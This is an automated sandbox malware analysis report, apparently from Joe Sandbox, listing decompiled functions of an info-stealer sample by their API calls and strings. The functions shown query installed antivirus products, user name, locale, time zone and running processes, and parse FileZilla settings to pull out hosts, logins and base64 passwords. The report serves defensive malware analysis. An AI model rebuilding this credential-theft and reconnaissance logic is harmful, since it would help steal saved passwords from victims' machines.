                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                      • String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
                                      • API String ID: 685420537-2561087649
                                      • Opcode ID: 95d0fe9bf3cf3acebe285d93a7aa7789aeab024a5a90146c6dfc7c47ba54c8a7
                                      • Instruction ID: 1046a30708bacd9825b417773caf8fb86f565ca17277848208f4e8df55dde9ec
                                      • Opcode Fuzzy Hash: 95d0fe9bf3cf3acebe285d93a7aa7789aeab024a5a90146c6dfc7c47ba54c8a7
                                      • Instruction Fuzzy Hash: 3E417D71A41229BBCB19DB99DC45EDFBBBCEF4DB60F108215F515A7280C774AA00CBA0
                                      Function 002FFC30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,003101E9), ref: 002FFC4D
                                      • LocalAlloc.KERNEL32(00000040,00000000), ref: 002FFC5F
                                      • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 002FFC69
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 002FFC93
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • LocalFree.KERNEL32(00000000), ref: 002FFD16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                      • String ID: /
                                      • API String ID: 507856799-4001269591
                                      • Opcode ID: 478c341d04fa2f0a2e7c7348ce31d3fabd2334611b9cd834c83f1cf3aed09083
                                      • Instruction ID: a6a9095f9e7ce7f250e507c277f0b4ba6f045c80528599fea4d75a4e8c42612f
                                      • Opcode Fuzzy Hash: 478c341d04fa2f0a2e7c7348ce31d3fabd2334611b9cd834c83f1cf3aed09083
                                      • Instruction Fuzzy Hash: FD21A27152021DBBEB54EBA0DD95EFEB77CEF88780F404134FA0596180DB709955CBA0
                                      Function 002FFBC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFBD1
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFBD8
                                      • GetTimeZoneInformation.KERNEL32(?), ref: 002FFBE7
                                      • wsprintfA.USER32 ref: 002FFC12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                      • String ID: wwww
                                      • API String ID: 3317088062-671953474
                                      • Opcode ID: 55f00571921764719af5855400606f84d4f61b147230f520fc7534fc8cdb197d
                                      • Instruction ID: bc2d47bca01eab719902f2d98ce0bcc9db22d8f9066ce2e185cb9f43f2864494
                                      • Opcode Fuzzy Hash: 55f00571921764719af5855400606f84d4f61b147230f520fc7534fc8cdb197d
                                      • Instruction Fuzzy Hash: 9BF0A771B0021CABEB2C6B78AC0DEAA7B6DAF56311F044365FD0ADA2D0DB7059194AD1
                                      Function 00301400 Relevance: 7.6, APIs: 5, Instructions: 53processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00301439
                                      • Process32First.KERNEL32(00000000,00000128), ref: 00301449
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030145B
                                      • StrCmpCA.SHLWAPI(?,?), ref: 00301470
                                      • CloseHandle.KERNEL32(00000000), ref: 00301482
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 7123be08aa9355e75a893c3a5c3b7591ba6ae00255e23fa45fcea6e59915320b
                                      • Instruction ID: 91ca58222d47cd99b00ea4e375274ab5449c202bb6f9df4302517455d2c53312
                                      • Opcode Fuzzy Hash: 7123be08aa9355e75a893c3a5c3b7591ba6ae00255e23fa45fcea6e59915320b
                                      • Instruction Fuzzy Hash: 0A11E172941218AFD7218F95DC55BEABBBCFF16740F00816AE90593280DB345A09CBE1
                                      Function 002FFAE0 Relevance: 4.5, APIs: 3, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFAEC
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFAF3
                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 002FFB07
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 182efa57e970614188f5e8d3de72c58bb1a28fbfea4754da526a0de901452209
                                      • Instruction ID: ae50e440eabca8fd9ea1f5e5dcb788726f212f7274afde50d110657100fe3093
                                      • Opcode Fuzzy Hash: 182efa57e970614188f5e8d3de72c58bb1a28fbfea4754da526a0de901452209
                                      • Instruction Fuzzy Hash: F9D012B1501218BFD7059BE59C0DFDA7B6CEB0D7A1F004191FA05D6240D5F0594087E1
                                      Function 002FFDA0 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoSystemwsprintf
                                      • String ID:
                                      • API String ID: 2452939696-0
                                      • Opcode ID: 18651e5d6d6fa9526c004e3d5eb32bc25cdcfb46cba343ca856b305fb1876fb7
                                      • Instruction ID: f29f9eb48f0bb2fa7608bf0da877b8d8d6dce17cb4c350f965933be29b9b0843
                                      • Opcode Fuzzy Hash: 18651e5d6d6fa9526c004e3d5eb32bc25cdcfb46cba343ca856b305fb1876fb7
                                      • Instruction Fuzzy Hash: A5D012B5C0020C97CB10DB90EC859E9B77CEF48300F004795EF05A2140E775AA5D8AE5
                                      Function 00535D70 Relevance: 2.4, APIs: 1, Instructions: 887memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualProtect.KERNEL32(-00001000,00001000,00000004,?,00000000), ref: 00536918
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 14cdbcb8150df80f339bc14e73528d37b26d4ba51bee5190abc436dde297e0c5
                                      • Instruction ID: 8112a5f7ab8fd2dc7ea47b9563927cef793f1c207ad5fd9161472bd83e1f80c0
                                      • Opcode Fuzzy Hash: 14cdbcb8150df80f339bc14e73528d37b26d4ba51bee5190abc436dde297e0c5
                                      • Instruction Fuzzy Hash: AA72BB316083559FD724CF28C88466ABBF1FF89384F158A2DE9A5CB351E371D949CB82
                                      Function 002FB9A0 Relevance: 70.3, APIs: 30, Strings: 10, Instructions: 335stringmemoryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                      • strtok_s.MSVCRT ref: 002FBA5E
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,003101E9,003101E9,003101E9,003101E9), ref: 002FBAA3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FBAAA
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 002FBAC6
                                      • lstrlen.KERNEL32(00000000), ref: 002FBAD1
                                        • Part of subcall function 00301200: malloc.MSVCRT ref: 00301209
                                        • Part of subcall function 00301200: strncpy.MSVCRT ref: 00301219
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 002FBB01
                                      • lstrlen.KERNEL32(00000000), ref: 002FBB0C
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 002FBB42
                                      • lstrlen.KERNEL32(00000000), ref: 002FBB4D
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002FBB7D
                                      • lstrlen.KERNEL32(00000000), ref: 002FBB88
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC06
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC1E
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC36
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC4E
                                      • lstrcat.KERNEL32(00000000,Soft: FileZilla), ref: 002FBC63
                                      • lstrcat.KERNEL32(00000000,Host: ), ref: 002FBC6F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBC7F
                                      • lstrcat.KERNEL32(00000000,00313454), ref: 002FBC8B
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBC9B
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBCA7
                                      • lstrcat.KERNEL32(00000000,Login: ), ref: 002FBCB3
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBCC3
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBCCF
                                      • lstrcat.KERNEL32(00000000,Password: ), ref: 002FBCDB
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBCEB
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBCF7
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBD03
